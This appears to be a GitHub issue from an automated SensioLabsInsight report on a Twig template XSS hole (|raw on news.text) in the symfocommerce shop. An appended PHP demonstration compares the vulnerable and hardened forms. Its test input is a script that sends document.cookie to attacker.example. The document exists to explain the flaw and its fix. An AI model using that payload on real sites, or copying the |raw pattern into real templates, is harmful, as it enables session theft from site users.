morozovalexander/symfocommerce

[Insight] Website should be protected against XSS Vulnerability - in src/Eshop/…/views/Catalog/index.html.twig, line 58

morozovalexander opened this issue · 0 comments

In src/Eshop/ShopBundle/Resources/views/Catalog/index.html.twig, line 58:

Using the |raw filter or the {% autoescape false %} block in a Twig template exposes users to Cross-Site Scripting (XSS) attacks.

            <div class="well">
                {% if news | length %}
                    {# line 58: |raw disables HTML autoescaping for news.text, so stored markup (including <script>) reaches the browser unmodified #}
                    <h4><strong>{{ news.title }}</strong></h4><div>{{ news.text|raw|nl2br }}</div><p class="pull-right">{{ news.date|date() }}</p>
                {% else %}
                    {{ 'news.nonews'|trans }}
                {% endif %}
            </div>

Posted from SensioLabsInsight
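The following is an added example, not code from the symfocommerce project or from the SensioLabsInsight report. It renders the flagged expression with Twig's own engine, once as it appears on line 58 and once with `|raw` removed, using a constructed news body that carries a script payload. It assumes twig/twig is installed through Composer (vendor/autoload.php) and PHP 8 for `str_contains`; the `renderNews` and `isEscaped` helpers are names chosen here for illustration.

```php
<?php
// Added example (not the project's code): compare the flagged Twig expression
// with its hardened form. Assumes twig/twig via Composer and PHP >= 8.0.
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Loader\ArrayLoader;

// Vulnerable form, as on index.html.twig line 58: |raw marks the value as
// safe, so the autoescaper (and nl2br's pre_escape) leave it untouched.
const TPL_RAW = '<div>{{ news.text|raw|nl2br }}</div>';

// Hardened form: simply drop |raw. Twig's core nl2br filter is declared with
// pre_escape=html and is_safe=html, so the text is HTML-escaped first and only
// the <br /> tags that nl2br inserts are emitted as markup.
const TPL_SAFE = '<div>{{ news.text|nl2br }}</div>';

function renderNews(string $template, string $text): string
{
    $loader = new ArrayLoader(['news' => $template]);
    // 'html' autoescaping is what Symfony applies to *.html.twig templates.
    $twig = new Environment($loader, ['autoescape' => 'html']);

    return $twig->render('news', ['news' => ['text' => $text]]);
}

// True when the script tag only survives as escaped text, not as markup.
function isEscaped(string $html): bool
{
    return !str_contains($html, '<script>')
        && str_contains($html, '&lt;script&gt;');
}

// Constructed sample: a news body that ended up in the database with markup
// in it (the original template shows nothing that would strip it).
$stored = "Sale today!\n<script>document.location='https://attacker.example/?c='+document.cookie</script>";

$vulnerable = renderNews(TPL_RAW, $stored);
$hardened   = renderNews(TPL_SAFE, $stored);

echo "raw|nl2br  : $vulnerable\n";
echo "nl2br only : $hardened\n";

// Self-check: the hardened output must neutralise the tag yet keep the
// line-break conversion the template was using |raw to obtain.
if (isEscaped($vulnerable)) {
    throw new RuntimeException('expected the |raw form to emit the script tag verbatim');
}
if (!isEscaped($hardened) || !str_contains($hardened, '<br />')) {
    throw new RuntimeException('hardened form must escape the payload and still insert <br />');
}
echo "ok: dropping |raw escapes the payload and nl2br still emits <br />\n";
```

The point worth checking before closing an issue like this: `|raw` was almost certainly added to keep `nl2br` output as markup, but that is already guaranteed by the filter's `is_safe` flag, so removing `|raw` loses nothing. If `news.text` is meant to hold editor-produced HTML, the fix is not `|raw` but passing the value through an allowlist HTML sanitizer before it is marked safe; autoescaping only protects against markup that should not be there at all.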